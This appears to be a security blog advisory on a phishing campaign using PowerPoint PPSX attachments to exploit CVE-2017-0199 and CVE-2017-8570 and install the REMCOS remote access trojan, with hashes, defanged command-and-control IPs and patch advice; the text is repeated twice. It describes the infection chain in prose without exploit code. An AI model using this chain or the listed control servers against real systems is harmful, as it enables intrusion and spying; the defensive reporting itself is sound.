PowerPoint Malware Attack (CVE-2017-8570 and CVE-2017-0199)

A few customers have recently encountered phishing attacks with malware on PowerPoint files; the attack exploits two main weaknesses.

The source of the weaknesses is at workstations that are missing the following updates: CVE-2017-8570 and CVE-2017-0199.

The first is CVE-2017-0199, originally a Zero-Day remote code execution vulnerability that allowed attackers to exploit a flaw in the Windows Object Linking and Embedding (OLE) interface of Microsoft Office to deliver malware.

The second is a remote code execution vulnerability in Microsoft Office software when it fails to handle objects in memory properly.

An attacker who successfully exploited the vulnerability could use a specially crafted file to perform actions in the current user’s security context.

Image result for malware powerpoint ratman

The Attack (in a short)

Like most of the hacking campaigns, it begins by sending a phishing email containing an attachment designed to look legitimate to end-users with attachments that are called ppsx.

Once the end-user opens the PowerPoint slide, it shows the text of CVE-2017-8570, which references a different vulnerability for Microsoft Office.

This infected file triggers an exploit for the CVE-2017-0199 vulnerability and starts infecting the end-user computer. When the malicious code is run through the animations feature on the PowerPoint Show, a file called logo.doc will be downloaded once the flaw is successfully exploited.

The logo.doc file is an XML file with a JavaScript code that runs a PowerShell command to download and execute a new program called RATMAN.exe. a Trojan version of the REMCOS remote access tool (RAT), which then connects to a command and control server.

REMCOS can carry out numerous criminal operations on the compromised system, including downloading and executing commands for other malware, keylogging, screen logging, and recording videos and audio for both webcam and microphone.

The REMCOS RAT allows the attacker to control a system from anywhere in the world.

The malicious file then uses an unknown .NET protector, which includes several protections and obfuscations that make it more difficult for security researchers to reverse engineer.

However, since most detecting the CVE-2017-0199 vulnerability focus on the RTF attack method, the use of the PPSX PowerPoint as an attack trajectory allows attackers to avoid antivirus detection.
If we can recap the attack its go with the following process:

  • Phishing Email received on user mailbox with PPSC file that includes malware
  • Troj_CVE20170199.jvu download file called logo.doc from C&C servers
  • Logo.doc download file called RATMAN.exe and execute the file
  • RATMAN allow remote code execution at the end-user

Indicators of Compromise

The following hashes were used for this article:

SHA256

  • a112274e109c5819d54aa8de89b0e707b243f4929a83e77439e3ff01ed218a35 (TROJ_CVE20170199.JVU)
  • 7c01555ba4b3cbb68ec17c86ac2058664ad56f9f9803a9ffbf2706f0e0ad2f1c – (JS_DLOADER.AUSYVT )
  • 9546c04cad4983b02adf6ed09a3c5674c0b1ae239883ae3d1b82b046ecee37a – (BKDR_RESCOMS.CA)

Related URL’s

  • hxxp://192[.]166[.]218[.]230:3550
  • hxxp://192[.]166[.]218[.]230:3550
  • 5[.]134[.]116[.]146:3550

Affected version

  • In the Microsoft Office 2007 Service Pack 3
  • in the Microsoft Office 2010 Service Pack 2 (32-bit Editions)
  • in the Microsoft Office 2010 Service Pack 2 (64–bit Editions)
  • in the Microsoft Office 2013 RT Service Pack 1
  • in the Microsoft Office 2013 Service Pack 1 (32-bit Editions)
  • in the Microsoft Office 2003 Service Pack 1 (64-bit editions)
  • Microsoft Office 2016 (32-bit edition)
  • Microsoft Office 2016 (64-bit edition)


How to fix

Microsoft already addressed this issue in April and July for both vulnerability

It is highly recommended to inform users not to open an unknown email.
Note: if you’ve got an EDR system such as Microsoft Defender ATP, it allows you to detect the attack and respond as need.

PowerPoint Malware Attack (CVE-2017-8570 and CVE-2017-0199)

A few customers have recently encountered phishing attacks with malware on PowerPoint files; the attack exploits two main weaknesses.
The source of the weaknesses is at workstations that are missing the following updates: CVE-2017-8570 and CVE-2017-0199.
The first is CVE-2017-0199, originally a Zero-Day remote code execution vulnerability that allowed attackers to exploit a flaw in the Windows Object Linking and Embedding (OLE) interface of Microsoft Office to deliver malware.
The second is a remote code execution vulnerability in Microsoft Office software when it fails to handle objects in memory properly.
An attacker who successfully exploited the vulnerability could use a specially crafted file to perform actions in the current user’s security context.

Image result for malware powerpoint ratman

The Attack (in a short)

Like most of the hacking campaigns, it begins by sending a phishing email containing an attachment designed to look legitimate to end-users with attachments that are called ppsx.
Once the end-user opens the PowerPoint slide, it shows the text of CVE-2017-8570, which references a different vulnerability for Microsoft Office.
This infected file triggers an exploit for the CVE-2017-0199 vulnerability and starts infecting the end-user computer. When the malicious code is run through the animations feature on the PowerPoint Show, a file called logo.doc will be downloaded once the flaw is successfully exploited.
The logo.doc file is an XML file with a JavaScript code that runs a PowerShell command to download and execute a new program called RATMAN.exe. a Trojan version of the REMCOS remote access tool (RAT), which then connects to a command and control server.
REMCOS can carry out numerous criminal operations on the compromised system, including downloading and executing commands for other malware, keylogging, screen logging, and recording videos and audio for both webcam and microphone.
The REMCOS RAT allows the attacker to control a system from anywhere in the world.
The malicious file then uses an unknown .NET protector, which includes several protections and obfuscations that make it more difficult for security researchers to reverse engineer.
However, since most detecting the CVE-2017-0199 vulnerability focus on the RTF attack method, the use of the PPSX PowerPoint as an attack trajectory allows attackers to avoid antivirus detection.
If we can recap the attack its go with the following process:

  • Phishing Email received on user mailbox with PPSC file that includes malware
  • Troj_CVE20170199.jvu download file called logo.doc from C&C servers
  • Logo.doc download file called RATMAN.exe and execute the file
  • RATMAN allow remote code execution at the end-user

Indicators of Compromise

The following hashes were used for this article:
SHA256

  • a112274e109c5819d54aa8de89b0e707b243f4929a83e77439e3ff01ed218a35 (TROJ_CVE20170199.JVU)
  • 7c01555ba4b3cbb68ec17c86ac2058664ad56f9f9803a9ffbf2706f0e0ad2f1c – (JS_DLOADER.AUSYVT )
  • 9546c04cad4983b02adf6ed09a3c5674c0b1ae239883ae3d1b82b046ecee37a – (BKDR_RESCOMS.CA)

Related URL’s

  • hxxp://192[.]166[.]218[.]230:3550
  • hxxp://192[.]166[.]218[.]230:3550
  • 5[.]134[.]116[.]146:3550

Affected version

  • In the Microsoft Office 2007 Service Pack 3
  • in the Microsoft Office 2010 Service Pack 2 (32-bit Editions)
  • in the Microsoft Office 2010 Service Pack 2 (64–bit Editions)
  • in the Microsoft Office 2013 RT Service Pack 1
  • in the Microsoft Office 2013 Service Pack 1 (32-bit Editions)
  • in the Microsoft Office 2003 Service Pack 1 (64-bit editions)
  • Microsoft Office 2016 (32-bit edition)
  • Microsoft Office 2016 (64-bit edition)


How to fix

Microsoft already addressed this issue in April and July for both vulnerability

It is highly recommended to inform users not to open an unknown email.
Note: if you’ve got an EDR system such as Microsoft Defender ATP, it allows you to detect the attack and respond as need.

You may also like...

Leave a Reply

error: Content is Protected !!
%d bloggers like this: